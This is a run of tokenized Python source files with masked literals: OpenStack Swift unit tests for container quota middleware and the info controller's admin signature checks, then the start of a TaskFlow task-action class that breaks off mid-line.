{ } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . 
blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_bytes_quota_copy_from_bad_src ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> def test_bytes_quota_copy_verb_no_src ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_exceed_counts_quota ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_counts_quota_copy_from ( self ) : <EOL> app = container_quotas . 
ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : { '<STR_LIT>' : <NUM_LIT:10> } , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_counts_quota_copy_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_exceed_counts_quota_copy_cross_account_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> a_c_cache = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } , <EOL> '<STR_LIT:status>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> a2_c_cache = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } , <EOL> '<STR_LIT:status>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : a_c_cache , <EOL> '<STR_LIT>' : a2_c_cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . 
body , '<STR_LIT>' ) <EOL> def test_exceed_counts_quota_copy_cross_account_PUT_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> a_c_cache = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } , <EOL> '<STR_LIT:status>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> a2_c_cache = { '<STR_LIT>' : '<STR_LIT:0>' , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } , <EOL> '<STR_LIT:status>' : <NUM_LIT:200> , '<STR_LIT>' : <NUM_LIT:1> } <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : a_c_cache , <EOL> '<STR_LIT>' : a2_c_cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:a>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> self . assertEqual ( res . body , '<STR_LIT>' ) <EOL> def test_not_exceed_counts_quota ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_not_exceed_counts_quota_copy_from ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . 
status_int , <NUM_LIT:200> ) <EOL> def test_not_exceed_counts_quota_copy_verb ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:2>' } } ) <EOL> req = Request . blank ( '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : cache } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_invalid_quotas ( self ) : <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : '<STR_LIT:abc>' } ) <EOL> res = req . get_response ( <EOL> container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : '<STR_LIT:abc>' } ) <EOL> res = req . get_response ( <EOL> container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> def test_valid_quotas ( self ) : <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( <EOL> container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : '<STR_LIT>' } ) <EOL> res = req . get_response ( <EOL> container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_delete_quotas ( self ) : <EOL> req = Request . 
blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT:POST>' , <EOL> '<STR_LIT>' : None } ) <EOL> res = req . get_response ( <EOL> container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT:200> ) <EOL> def test_missing_container ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeMissingApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:0> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:100>' } } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> def test_auth_fail ( self ) : <EOL> app = container_quotas . ContainerQuotaMiddleware ( FakeApp ( ) , { } ) <EOL> cache = FakeCache ( { '<STR_LIT>' : <NUM_LIT:1> , '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT:1>' } , <EOL> '<STR_LIT>' : None } ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , <EOL> environ = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : cache , <EOL> '<STR_LIT>' : '<STR_LIT:100>' , <EOL> '<STR_LIT>' : lambda * args : HTTPUnauthorized ( ) } ) <EOL> res = req . get_response ( app ) <EOL> self . assertEqual ( res . status_int , <NUM_LIT> ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import json <EOL> import unittest <EOL> import time <EOL> from mock import Mock <EOL> from swift . proxy . controllers import InfoController <EOL> from swift . proxy . server import Application as ProxyApp <EOL> from swift . common import utils <EOL> from swift . common . swob import Request , HTTPException <EOL> class TestInfoController ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> utils . _swift_info = { } <EOL> utils . _swift_admin_info = { } <EOL> def get_controller ( self , expose_info = None , disallowed_sections = None , <EOL> admin_key = None ) : <EOL> disallowed_sections = disallowed_sections or [ ] <EOL> app = Mock ( spec = ProxyApp ) <EOL> return InfoController ( app , None , expose_info , <EOL> disallowed_sections , admin_key ) <EOL> def start_response ( self , status , headers ) : <EOL> self . got_statuses . append ( status ) <EOL> for h in headers : <EOL> self . got_headers . append ( { h [ <NUM_LIT:0> ] : h [ <NUM_LIT:1> ] } ) <EOL> def test_disabled_info ( self ) : <EOL> controller = self . get_controller ( expose_info = False ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> info = json . loads ( resp . body ) <EOL> self . assertTrue ( '<STR_LIT>' not in info ) <EOL> self . 
assertTrue ( '<STR_LIT:foo>' in info ) <EOL> self . assertTrue ( '<STR_LIT:bar>' in info [ '<STR_LIT:foo>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT:foo>' ] [ '<STR_LIT:bar>' ] , '<STR_LIT>' ) <EOL> def test_options_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True ) <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . OPTIONS ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> self . assertTrue ( '<STR_LIT>' in resp . headers ) <EOL> def test_get_info_cors ( self ) : <EOL> controller = self . get_controller ( expose_info = True ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } , <EOL> headers = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> info = json . loads ( resp . body ) <EOL> self . assertTrue ( '<STR_LIT>' not in info ) <EOL> self . assertTrue ( '<STR_LIT:foo>' in info ) <EOL> self . assertTrue ( '<STR_LIT:bar>' in info [ '<STR_LIT:foo>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT:foo>' ] [ '<STR_LIT:bar>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( '<STR_LIT>' in resp . headers ) <EOL> self . assertTrue ( '<STR_LIT>' in resp . headers ) <EOL> def test_head_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> resp = controller . 
HEAD ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_disallow_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> disallowed_sections = [ '<STR_LIT>' ] ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> req = Request . blank ( <EOL> '<STR_LIT>' , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> info = json . loads ( resp . body ) <EOL> self . assertTrue ( '<STR_LIT:foo>' in info ) <EOL> self . assertTrue ( '<STR_LIT:bar>' in info [ '<STR_LIT:foo>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT:foo>' ] [ '<STR_LIT:bar>' ] , '<STR_LIT>' ) <EOL> self . assertTrue ( '<STR_LIT>' not in info ) <EOL> def test_disabled_admin_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True , admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_admin_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . 
_swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> info = json . loads ( resp . body ) <EOL> self . assertTrue ( '<STR_LIT>' in info ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> def test_head_admin_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . 
blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_admin_info_invalid_method ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_admin_info_invalid_expires ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = <NUM_LIT:1> <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> expires = '<STR_LIT:abc>' <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . 
blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_admin_info_invalid_path ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_get_admin_info_invalid_key ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . _swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> def test_admin_disallow_info ( self ) : <EOL> controller = self . get_controller ( expose_info = True , <EOL> disallowed_sections = [ '<STR_LIT>' ] , <EOL> admin_key = '<STR_LIT>' ) <EOL> utils . 
_swift_info = { '<STR_LIT:foo>' : { '<STR_LIT:bar>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> utils . _swift_admin_info = { '<STR_LIT>' : { '<STR_LIT>' : '<STR_LIT>' } } <EOL> expires = int ( time . time ( ) + <NUM_LIT> ) <EOL> sig = utils . get_hmac ( '<STR_LIT:GET>' , '<STR_LIT>' , expires , '<STR_LIT>' ) <EOL> path = '<STR_LIT>' . format ( <EOL> sig = sig , expires = expires ) <EOL> req = Request . blank ( <EOL> path , environ = { '<STR_LIT>' : '<STR_LIT:GET>' } ) <EOL> resp = controller . GET ( req ) <EOL> self . assertTrue ( isinstance ( resp , HTTPException ) ) <EOL> self . assertEqual ( '<STR_LIT>' , str ( resp ) ) <EOL> info = json . loads ( resp . body ) <EOL> self . assertTrue ( '<STR_LIT>' not in info ) <EOL> self . assertTrue ( '<STR_LIT>' in info ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] ) <EOL> self . assertTrue ( '<STR_LIT>' in info [ '<STR_LIT>' ] [ '<STR_LIT>' ] ) <EOL> self . assertEqual ( info [ '<STR_LIT>' ] [ '<STR_LIT>' ] [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> unittest . main ( ) </s>
<s> import functools <EOL> from taskflow . engines . action_engine . actions import base <EOL> from taskflow import logging <EOL> from taskflow import states <EOL> from taskflow import task as task_atom <EOL> from taskflow . types import failure <EOL> LOG = logging . getLogger ( __name__ ) <EOL> class TaskAction ( base . Action ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , storage , notifier , task_executor ) : <EOL> super ( TaskAction , self ) . __init__ ( storage , notifier ) <EOL> self . _task_executor = task_executor <EOL> def _is_identity_transition ( self , old_state , state , task , progress = None ) : <EOL> if state in self . SAVE_RESULT_STATES : <EOL> return False <EOL> if state != old_state : <EOL> return False <EOL> if progress is None : <EOL> return False <EOL> old_progress = self . _storage . get_task_progress ( task . name ) <EOL> if old_progress != progress : <EOL> return False <EOL> return True <EOL> def change_state ( self , task , state , <EOL> progress = None , result = base . Action . NO_RESULT ) : <EOL> old_state = self . _storage . get_atom_state ( task . name ) <EOL> if self . _is_identity_transition ( old_state , state , task , <EOL> progress = progress ) : <EOL> return <EOL> if state in self . SAVE_RESULT_STATES : <EOL> save_result = None <EOL> if result is not self . NO_RESULT : <EOL> save_result = result <EOL> self . _storage . save ( task . name , save_result , state ) <EOL> else : <EOL> self . _storage . set_atom_state ( task . name , state ) <EOL> if progress is not None : <EOL> self . _storage . set_task_progress ( task . name , progress ) <EOL> task_uuid = self . _storage . get_atom_uuid ( task . name ) <EOL> details = { <EOL> '<STR_LIT>' : task . name , <EOL> '<STR_LIT>' : task_uuid , <EOL> '<STR_LIT>' : old_state , <EOL> } <EOL> if result is not self . NO_RESULT : <EOL> details [ '<STR_LIT:result>' ] = result <EOL> self . _notifier . notify ( state , details ) <EOL> if progress is not None : <EOL> task . 
update_progress ( progress ) <EOL> def _on_update_progress ( self , task , event_type , details ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> progress = details . pop ( '<STR_LIT>' ) <EOL> except KeyError : <EOL> pass <EOL> else : <EOL> try : <EOL> self . _storage . set_task_progress ( task . name , progress , <EOL> details = details ) <EOL> except Exception : <EOL> LOG . exception ( "<STR_LIT>" , <EOL> task , progress ) <EOL> def schedule_execution ( self , task ) : <EOL> self . change_state ( task , states . RUNNING , progress = <NUM_LIT:0.0> ) <EOL> arguments = self . _storage . fetch_mapped_args ( <EOL> task . rebind , <EOL> atom_name = task . name , <EOL> optional_args = task . optional <EOL> ) <EOL> if task . notifier . can_be_registered ( task_atom . EVENT_UPDATE_PROGRESS ) : <EOL> progress_callback = functools . partial ( self . _on_update_progress , <EOL> task ) <EOL> else : <EOL> progress_callback = None <EOL> task_uuid = self . _storage . get_atom_uuid ( task . name ) <EOL> return self . _task_executor . execute_task ( <EOL> task , task_uuid , arguments , <EOL> progress_callback = progress_callback ) <EOL> def complete_execution ( self , task , result ) : <EOL> if isinstance ( result , failure . Failure ) : <EOL> self . change_state ( task , states . FAILURE , result = result ) <EOL> else : <EOL> self . change_state ( task , states . SUCCESS , <EOL> result = result , progress = <NUM_LIT:1.0> ) <EOL> def schedule_reversion ( self , task ) : <EOL> self . change_state ( task , states . REVERTING , progress = <NUM_LIT:0.0> ) <EOL> arguments = self . _storage . fetch_mapped_args ( <EOL> task . revert_rebind , <EOL> atom_name = task . name , <EOL> optional_args = task . revert_optional <EOL> ) <EOL> task_uuid = self . _storage . get_atom_uuid ( task . name ) <EOL> task_result = self . _storage . get ( task . name ) <EOL> failures = self . _storage . get_failures ( ) <EOL> if task . notifier . can_be_registered ( task_atom . 
